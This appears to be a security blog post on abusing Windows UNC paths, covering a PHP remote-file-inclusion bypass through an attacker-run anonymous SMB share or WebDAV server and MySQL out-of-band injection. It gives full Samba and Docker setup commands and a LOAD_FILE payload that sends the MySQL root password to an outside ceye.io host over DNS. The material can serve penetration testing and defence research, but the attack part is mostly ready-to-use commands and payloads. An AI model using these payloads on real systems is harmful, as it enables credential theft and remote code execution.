The Microsoft Windows UNC
The Microsoft Windows UNC, short for Universal Naming Convention or Uniform Naming Convention, specifies a common syntax to describe the location of a network resource, such as a shared file, directory, or printer. The UNC syntax for Windows systems has the generic form:
\\ComputerName\SharedFolder\Resource
Some Microsoft Windows interfaces also allow or require UNC syntax for WebDAV share access, rather than a URL. The UNC syntax is extended with optional components to denote use of SSL and TCP/IP port number, a WebDAV URL of http[s]://HostName[:Port]/SharedFolder/Resource
becomes:
\\HostName[@SSL][@Port]\SharedFolder\Resource
Vul1: Exploiting RFI in PHP Bypass Remote URL Inclusion Restriction
Overview
Via. http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html
A few days ago, there’s an article on Twitter about exploiting remote file inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction. This is a perfect trick.
In PHP Configuration file, allow_url_include wrapper by-default set to “Off” which instruct PHP not to load remote HTTP or FTP URLs and hence prevent Remote File Inclusion attack. But, PHP does not block SMB URL loading even if “allow_url_include” and “allow_url_fopen” both are set to “Off”.
This trick exploits Windows UNC’s characteristics. Attack chain: UNC->SMB->DATA
.
In addition to SMB, you can also use unauthorized WebDAV.
SMB
Configuring the Samba Server with anonymous read access (Linux Machine).
In Kali Linux, install the Samba using the following commands:
apt-get install samba
Create SMB share directory:
mkdir /var/www/html/pub/
Configure permissions on newly created SMB share directory:
chmod 0555 /var/www/html/pub/
chown -R nobody:nogroup /var/www/html/pub/
Run below mentioned command to remove default content of SAMBA server config file:
echo > /etc/samba/smb.conf
Put below mentioned content in file /etc/samba/smb.conf
:
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = indishell-lab
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes
[ethan]
path = /var/www/html/pub
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody
Now, restart Samba Server to apply new configuration spcified in config file /etc/samba/smb.conf
:
service smbd restart
Once SAMBA server has been restarted successfully, try to access SMB share and make sure SAMBA server is not asking for credentials:
\\192.168.0.111\ethan\filename
WebDAV
Start a WebDAV service with Docker:
Use https://github.com/BytemarkHosting/docker-webdav. Just put the result file in /root/WebDAV/data
, but username and password are necessary. :(
docker run -v /root/webdav:/var/lib/dav -e USERNAME=admin -e PASSWORD=admin -p 8000:80 --rm --name webdav bytemark/webdav
Use https://github.com/idelsink/webdav-docker.
docker run --name=webdav -d -v /root/webdav:/webdav -p 8000:80 idelsink/webdav
The WebDAV client of Windows relies on the Webclient Service (Default opening). If you want to access the WebDAV Service through UNC, you have to start the service first.
Notice: The webclient of windows will change the path of requesting WebDAV to uppercase, while Apache defaults to case-sensitive when matching paths. It discovered by log file. The uppercase path is blocked directly and returned to 403.
You can use pure digital paths and file names to solve this problem.
Vul2: MySQL OOB Injection
Overview
Via. https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking
Out-of-band injection involve in alternative channels to extract data from the server. It might be HTTP(S) requests, DNS resolutions, file systems, E-mails, etc depending on the functionality of the back-end technology.
From the Payloads provided by CEYE, it can be seen that OOB injection is very well researched in MSSQL and Oracle. But in MySQL and PostgreSQL, it is limited. The payload provided by CEYE for MySQL is:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));
You can see that there are a lot of backslashes \
.
Notice: This also exploits Windows UNC’s characteristics.
Limitations
This option sets the secure_file_priv system variable, which is used to limit the effect of data import and export operations, such as those performed by the LOAD DATA
and SELECT ... INTO OUTFILE
statements and the LOAD_FILE()
function. Refer to the link: https://dev.mysql.com/doc/refman/5.7/en/server-options.html
Property | Value |
---|---|
Command-Line Format | --secure-file-priv=dir_name |
System Variable | secure_file_priv |
Scope | Global |
Dynamic | No |
Type | String |
Default Value (>= 5.7.6) | platform specific |
Default Value (<= 5.7.5) | empty string |
Valid Values (>= 5.7.6) | empty string, dirname, NULL |
Valid Values (<= 5.7.5) | empty string, dirname |